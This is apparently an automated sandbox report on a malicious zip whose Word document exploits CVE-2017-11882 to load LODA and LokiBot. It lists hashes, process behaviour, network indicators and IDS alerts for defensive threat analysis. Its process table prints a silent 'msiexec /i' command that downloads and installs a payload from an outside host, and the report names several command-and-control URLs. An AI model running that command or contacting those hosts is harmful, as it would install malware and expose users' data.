analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

6190254132756480.zip

Full analysis: https://app.any.run/tasks/fb72bbb3-4bfe-4ecf-8ead-06e628982f34
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 19, 2019, 13:28:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
loader
exe-to-msi
evasion
trojan
loda
lokibot
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

51408F0667C52A7A3628F8F3EE72099D

SHA1:

221C0C5DF4EF20F6C317474820C7BE7AD3470376

SHA256:

7BCC6FAE6D97BF7B5597F3A45F0991107093CEAC91A484016ECB4B6C7FB40E3E

SSDEEP:

384:boe3Is+9xBck/bqbHDPMP5wLWKqN4Kz127D0:bO5cIIHDkRwiYKzk7D0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3368)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2888)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 1244)
    • Application was dropped or rewritten from another process

      • JSFIEI.exe (PID: 1856)
      • JSFIEI.exe (PID: 3356)
    • Changes the autorun value in the registry

      • WScript.exe (PID: 3424)
      • wscript.exe (PID: 3648)
      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 1360)
    • Writes to a start menu file

      • WScript.exe (PID: 3424)
      • wscript.exe (PID: 3648)
      • wscript.exe (PID: 3400)
      • wscript.exe (PID: 1360)
    • LODA was detected

      • MSI9774.tmp (PID: 2912)
    • Connects to CnC server

      • wscript.exe (PID: 3400)
      • MSI9774.tmp (PID: 2912)
      • JSFIEI.exe (PID: 3356)
      • wscript.exe (PID: 1360)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 1040)
    • Uses Task Scheduler to run other applications

      • JSFIEI.exe (PID: 1856)
    • LOKIBOT was detected

      • JSFIEI.exe (PID: 3356)
    • Actions looks like stealing of personal data

      • JSFIEI.exe (PID: 3356)
  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 3368)
      • EQNEDT32.EXE (PID: 3396)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3368)
      • wscript.exe (PID: 3400)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 1244)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 1244)
      • MSI9774.tmp (PID: 2912)
      • JSFIEI.exe (PID: 1856)
    • Executes scripts

      • MSI9774.tmp (PID: 2912)
      • WScript.exe (PID: 3424)
      • wscript.exe (PID: 3400)
    • Uses RUNDLL32.EXE to load library

      • MSI9774.tmp (PID: 2912)
    • Reads Internet Cache Settings

      • rundll32.exe (PID: 2008)
    • Creates files in the user directory

      • MSI9774.tmp (PID: 2912)
      • rundll32.exe (PID: 2008)
      • WScript.exe (PID: 3424)
      • wscript.exe (PID: 3648)
      • JSFIEI.exe (PID: 1856)
      • wscript.exe (PID: 3400)
      • JSFIEI.exe (PID: 3356)
    • Application launched itself

      • WScript.exe (PID: 3424)
      • wscript.exe (PID: 3400)
      • JSFIEI.exe (PID: 1856)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 2804)
      • cmd.exe (PID: 988)
    • Loads DLL from Mozilla Firefox

      • JSFIEI.exe (PID: 3356)
  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 3624)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3624)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3624)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3368)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 1244)
    • Application was dropped or rewritten from another process

      • MSI9774.tmp (PID: 2912)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 1244)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Unknown (99)
ZipModifyDate: 1980:00:00 00:00:00
ZipCRC: 0x00000000
ZipCompressedSize: 12747
ZipUncompressedSize: 13808
ZipFileName: dfea54ed8023191bc8f914eaa6c02ea4a2ffe016adb9b1d005d25855d8b7bbed
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
60
Monitored processes
20
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start winrar.exe no specs winword.exe eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs #LODA msi9774.tmp jsfiei.exe wscript.exe rundll32.exe no specs wscript.exe wscript.exe wscript.exe cmd.exe no specs taskkill.exe no specs schtasks.exe no specs #LOKIBOT jsfiei.exe cmd.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1684"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\6190254132756480.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
3624"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\PO-24470.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3368"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2888cmd.exe & /C CD C: & msiexec.exe /i http://greenroomstudio.live/app/wpdsbp.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3816msiexec.exe /i http://greenroomstudio.live/app/wpdsbp.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1244C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3396"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2912"C:\Windows\Installer\MSI9774.tmp"C:\Windows\Installer\MSI9774.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Version:
3, 3, 8, 1
1856"C:\Users\admin\AppData\Local\Temp\JSFIEI.exe" C:\Users\admin\AppData\Local\Temp\JSFIEI.exe
MSI9774.tmp
User:
admin
Integrity Level:
MEDIUM
Description:
VistaTask
Exit code:
0
Version:
1.4.8.0
3424"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\WRDRVL..js" C:\Windows\System32\WScript.exe
MSI9774.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Total events
2 844
Read events
2 278
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
26
Text files
36
Unknown types
12

Dropped files

PID
Process
Filename
Type
1684WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb1684.43907\dfea54ed8023191bc8f914eaa6c02ea4a2ffe016adb9b1d005d25855d8b7bbed
MD5:
SHA256:
3624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3205.tmp.cvr
MD5:
SHA256:
3624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{0D8848BF-0D32-454D-8B12-1CD294932B82}
MD5:
SHA256:
3624WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{E7138607-0375-4084-B814-F69FC02E719A}
MD5:
SHA256:
3624WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D7FC8C7D35F7E3E374C7FC76BC5B342C
SHA256:D66156615F1FDD5FF4812E0672F4A07CD96628781D89444CDECAA01CF91610D3
3624WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:73B2D21760140173A81C9A10E98B924F
SHA256:3C3B76436015089AF49CF6FCF597F7F68B26BE28972552FC2BB47E094B2673DF
3624WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9933E073-5B36-421D-BA1A-E58B16F96ED4}.FSDbinary
MD5:E587E076B75264252F55AA67825D92BC
SHA256:E6CA33698D67F6E3F3B8F8E567D2C3A04CC25D75FB32288F6B8234300F4DEB63
3624WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:FCBC405FE4833E0B9651B4BC04AA7C2C
SHA256:F04407AA9BE1459C31EC842B765E379619B4800AC1AE240809D365132DEA4E2B
3624WINWORD.EXEC:\Users\admin\Desktop\~$-24470.docxpgc
MD5:7F5E1BF5EA35C286714B9E679E747BB9
SHA256:0D2585893D1A6495BDBD40141E498996E0157068BCCAB547CA89A9C43C5D98EE
3624WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:9B2C0AF987E5DEE9ADFA750256A27D0D
SHA256:2695A804A6ED79792606E6F6BDE9AC37D2D015F62309BAE2989F296C3059B84E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
13
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
972
svchost.exe
OPTIONS
31.14.15.154:80
http://greenroomstudio.live/
RO
suspicious
1244
msiexec.exe
GET
200
31.14.15.154:80
http://greenroomstudio.live/app/wpdsbp.msi
RO
executable
624 Kb
suspicious
3400
wscript.exe
GET
172.245.14.10:80
http://doughnut-snack.live/bpvpl.tar.gz
US
malicious
3624
WINWORD.EXE
OPTIONS
31.14.15.154:80
http://greenroomstudio.live/app/
RO
suspicious
3624
WINWORD.EXE
GET
200
31.14.15.154:80
http://greenroomstudio.live/app/updates.doc
RO
text
261 Kb
suspicious
3400
wscript.exe
POST
103.136.43.131:1425
http://vemvemserver.duckdns.org:1425/is-ready
unknown
malicious
1360
wscript.exe
POST
185.247.228.14:7755
http://unknownsoft.duckdns.org:7755/is-ready
unknown
malicious
1360
wscript.exe
POST
185.247.228.14:7755
http://unknownsoft.duckdns.org:7755/is-ready
unknown
malicious
3400
wscript.exe
GET
172.245.14.10:80
http://doughnut-snack.live/klplu.tar.gz
US
malicious
3356
JSFIEI.exe
POST
185.159.153.76:80
http://irubix.ir/wp-includes/layout/fre.php
IR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1244
msiexec.exe
31.14.15.154:80
greenroomstudio.live
T-Mobile Czech Republic a.s.
RO
suspicious
3624
WINWORD.EXE
31.14.15.154:80
greenroomstudio.live
T-Mobile Czech Republic a.s.
RO
suspicious
1360
wscript.exe
185.247.228.14:7755
unknownsoft.duckdns.org
malicious
2912
MSI9774.tmp
104.25.210.99:443
ipapi.co
Cloudflare Inc
US
shared
972
svchost.exe
31.14.15.154:80
greenroomstudio.live
T-Mobile Czech Republic a.s.
RO
suspicious
3400
wscript.exe
103.136.43.131:1425
vemvemserver.duckdns.org
malicious
185.247.228.14:7755
unknownsoft.duckdns.org
malicious
185.159.153.76:80
irubix.ir
Fanavari Serverpars Argham Gostar Company Ltd.
IR
malicious
3400
wscript.exe
172.245.14.10:80
doughnut-snack.live
ColoCrossing
US
malicious
103.136.43.131:3120
vemvemserver.duckdns.org
malicious

DNS requests

Domain
IP
Reputation
greenroomstudio.live
  • 31.14.15.154
suspicious
ipapi.co
  • 104.25.210.99
shared
vemvemserver.duckdns.org
  • 103.136.43.131
malicious
unknownsoft.duckdns.org
  • 185.247.228.14
malicious
doughnut-snack.live
  • 172.245.14.10
malicious
irubix.ir
  • 185.159.153.76
malicious

Threats

PID
Process
Class
Message
1244
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (ipapi .co in DNS lookup)
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3400
wscript.exe
A Network Trojan was detected
ET TROJAN WSHRAT CnC Checkin
3400
wscript.exe
A Network Trojan was detected
ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2912
MSI9774.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loda Logger CnC Beacon
3356
JSFIEI.exe
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
3356
JSFIEI.exe
A Network Trojan was detected
ET TROJAN LokiBot Checkin
17 ETPRO signatures available at the full report
No debug info